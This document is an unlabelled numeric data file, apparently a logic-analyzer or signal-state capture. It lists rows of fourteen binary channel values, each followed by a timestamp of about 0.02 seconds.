0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.0056888e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.0056912e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.0056940e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.0056964e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.0056988e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.0057012e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.0057036e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.0057060e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.0057088e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.0057116e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.0057140e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.0057164e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.0057188e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.0057212e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.0057236e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.0057264e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.0057288e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.0057316e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.0057340e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.0057364e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.0057388e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.0057412e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.0057436e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.0057464e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.0057492e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.0057516e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.0057540e-02 0,0,0,1,0,0,0,0,0,0,0,0,1,0,2.0057564e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,0,2.0057588e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,0,2.0057592e-02 0,0,0,1,0,1,0,0,0,1,0,0,0,1,2.0181932e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,1,2.0182172e-02 1,0,0,1,0,1,0,0,0,1,0,1,0,1,2.0182204e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,1,2.0182228e-02 1,0,0,1,0,1,0,0,0,1,0,0,1,1,2.0182520e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,1,2.0182552e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,1,2.0182556e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,1,2.0182600e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,1,2.0182628e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,1,2.0182676e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,1,2.0182700e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,1,2.0182756e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.0182764e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.0182776e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.0182828e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.0182852e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,2.0182856e-02 1,0,0,1,0,1,0,0,0,1,0,0,1,0,2.0182876e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,2.0182900e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.0182908e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.0182924e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,2.0182956e-02 1,0,0,1,0,1,0,0,0,1,0,0,1,0,2.0182976e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,2.0183000e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.0183008e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.0183052e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.0183076e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.0183124e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.0183156e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.0183204e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.0183228e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.0183276e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.0183300e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,2.0183308e-02 1,0,0,1,0,1,0,0,0,1,0,0,1,0,2.0183324e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.0183356e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.0183376e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.0183400e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,2.0183404e-02 1,0,0,1,0,1,0,0,0,1,0,0,1,0,2.0183428e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,2.0183452e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.0183460e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.0183500e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.0183524e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.0183576e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.0183604e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.0183652e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.0183676e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.0183724e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.0183752e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,2.0183756e-02 1,0,0,1,0,1,0,0,0,1,0,0,1,0,2.0183776e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,2.0183800e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.0183808e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.0183828e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.0183852e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,2.0183856e-02 1,0,0,1,0,1,0,0,0,1,0,0,1,0,2.0183876e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,2.0183900e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.0183908e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.0183952e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.0183976e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.0184028e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.0184052e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.0184100e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.0184124e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.0184176e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,2.0184204e-02 1,0,0,1,0,1,0,0,0,1,0,0,1,0,2.0184228e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,2.0184252e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.0184260e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.0184276e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.0184300e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.0184324e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.0184348e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.0184376e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.0184400e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.0184428e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.0184452e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.0184476e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.0184500e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.0184524e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.0184548e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.0184576e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.0184600e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.0184628e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.0184652e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.0184700e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.0184724e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,2.0184732e-02 1,0,0,1,0,1,0,0,0,1,0,0,1,0,2.0184776e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,2.0184804e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.0184808e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.0184852e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.0184876e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.0184924e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.0184952e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.0185004e-02 1,0,0,1,0,0,0,0,0,1,0,0,0,0,2.0185028e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,2.0185032e-02 1,0,0,1,0,1,0,0,0,1,0,0,1,0,2.0185052e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,2.0185076e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.0185084e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.0185100e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.0185124e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.0185148e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.0185176e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.0185200e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.0185228e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.0185252e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.0185276e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.0185300e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.0185324e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,2.0185332e-02 1,0,0,1,0,1,0,0,0,1,0,0,1,0,2.0185376e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,2.0185404e-02 1,0,0,1,0,1,0,0,0,0,0,0,0,0,2.0185408e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.0185412e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.0185428e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.0185452e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.0185476e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.0185500e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,2.0185508e-02 1,0,0,1,0,1,0,0,0,1,0,0,1,0,2.0185524e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,2.0185548e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.0185556e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.0185604e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.0185628e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.0185676e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.0185700e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.0185752e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.0185776e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.0185828e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.0185852e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,2.0185856e-02 1,0,0,1,0,1,0,0,0,1,0,0,1,0,2.0185876e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,2.0185900e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.0185908e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.0185924e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.0185948e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.0185976e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.0186000e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.0186028e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.0186052e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.0186076e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.0186100e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.0186124e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.0186148e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.0186176e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.0186200e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.0186228e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.0186248e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.0186276e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,2.0186300e-02 1,0,0,1,0,1,0,0,0,1,0,0,1,0,2.0186348e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,2.0186372e-02 1,0,0,1,0,1,0,0,0,1,0,0,1,0,2.0186396e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,2.0186424e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.0186428e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.0186476e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.0186500e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.0186548e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.0186572e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.0186624e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.0186648e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,2.0186652e-02 1,0,0,1,0,1,0,0,0,1,0,0,1,0,2.0186676e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,2.0186700e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.0186708e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.0186724e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.0186748e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.0186772e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.0186796e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.0186848e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.0186876e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.0186924e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.0186948e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,2.0186956e-02 1,0,0,1,0,1,0,0,0,1,0,0,1,0,2.0186996e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,2.0187024e-02 1,0,0,1,0,1,0,0,0,0,0,0,0,0,2.0187028e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.0187032e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.0187076e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.0187100e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.0187148e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.0187172e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.0187196e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.0187224e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.0187248e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.0187276e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.0187324e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.0187348e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.0187396e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.0187424e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,2.0187428e-02 1,0,0,1,0,1,0,0,0,1,0,0,1,0,2.0187476e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,2.0187500e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.0187508e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.0187548e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.0187572e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.0187624e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.0187648e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.0187676e-02 1,0,0,1,0,0,0,0,0,1,0,0,0,0,2.0187700e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,2.0187704e-02 1,0,0,1,0,1,0,0,0,1,0,0,1,0,2.0187748e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,2.0187772e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.0187780e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.0187796e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.0187824e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.0187848e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.0187876e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.0187900e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.0187924e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.0187948e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.0187972e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,2.0187980e-02 1,0,0,1,0,1,0,0,0,1,0,0,1,0,2.0188024e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,2.0188048e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.0188056e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.0188076e-02 1,0,0,1,0,0,0,0,0,1,0,0,0,0,2.0188100e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,2.0188104e-02 1,0,0,1,0,1,0,0,0,1,0,0,1,0,2.0188148e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,2.0188172e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.0188180e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.0188196e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.0188224e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.0188248e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.0188276e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.0188300e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.0188324e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,2.0188328e-02 1,0,0,1,0,1,0,0,0,1,0,0,1,0,2.0188348e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,2.0188372e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.0188380e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.0188424e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.0188448e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.0188476e-02 1,0,0,1,0,0,0,0,0,1,0,0,0,0,2.0188500e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,2.0188504e-02 1,0,0,1,0,1,0,0,0,1,0,0,1,0,2.0188524e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,2.0188548e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.0188556e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.0188596e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.0188624e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.0188676e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.0188700e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.0188748e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.0188772e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.0188824e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.0188848e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,2.0188852e-02 1,0,0,1,0,1,0,0,0,1,0,0,1,0,2.0188876e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,2.0188900e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.0188908e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.0188924e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.0188948e-02 1,0,0,1,0,0,0,0,0,1,0,0,0,0,2.0188952e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,2.0188956e-02 1,0,0,1,0,1,0,0,0,1,0,0,1,0,2.0188996e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,2.0189024e-02 1,0,0,1,0,1,0,0,0,0,0,0,0,0,2.0189028e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.0189032e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.0189048e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.0189076e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.0189100e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.0189124e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.0189148e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.0189172e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.0189196e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.0189224e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,2.0189228e-02 1,0,0,1,0,1,0,0,0,1,0,0,1,0,2.0189276e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,2.0189300e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.0189308e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.0189324e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.0189348e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.0189372e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.0189396e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.0189424e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.0189448e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.0189476e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.0189500e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.0189524e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.0189548e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.0189572e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.0189596e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.0189624e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.0189648e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.0189676e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.0189700e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.0189724e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.0189748e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.0189772e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.0189796e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.0189824e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.0189848e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.0189876e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.0189900e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.0189924e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.0189948e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.0189972e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.0189996e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.0190024e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.0190048e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.0190076e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.0190100e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,2.0190124e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,2.0190148e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,1,2.0313836e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,1,2.0314020e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,1,2.0314044e-02 0,1,0,1,0,0,0,0,0,0,0,1,0,1,2.0314072e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,1,2.0314100e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,1,2.0314384e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,1,2.0314412e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,1,2.0314436e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,1,2.0314460e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,1,2.0314484e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,1,2.0314508e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,1,2.0314532e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,1,2.0314556e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,1,2.0314584e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,1,2.0314604e-02 0,1,0,1,0,1,0,0,0,0,0,0,0,1,2.0314612e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,1,2.0314616e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,1,2.0314628e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,1,2.0314656e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,2.0314668e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,2.0314684e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,2.0314708e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,2.0314732e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,2.0314756e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,2.0314760e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,2.0314784e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,2.0314804e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,2.0314832e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,2.0314856e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,2.0314884e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,2.0314908e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,2.0314932e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,2.0314956e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,2.0314964e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,2.0314984e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,2.0315004e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,2.0315032e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,2.0315056e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,2.0315084e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,2.0315108e-02 0,1,0,1,0,0,0,0,0,1,0,0,0,0,2.0315112e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,2.0315116e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,2.0315132e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,2.0315156e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,2.0315184e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,2.0315204e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,2.0315228e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,2.0315256e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,2.0315284e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,2.0315308e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,2.0315316e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,2.0315332e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,2.0315356e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,2.0315384e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,2.0315404e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,2.0315432e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,2.0315456e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,2.0315460e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,2.0315484e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,2.0315508e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,2.0315532e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,2.0315556e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,2.0315584e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,2.0315604e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,2.0315632e-02 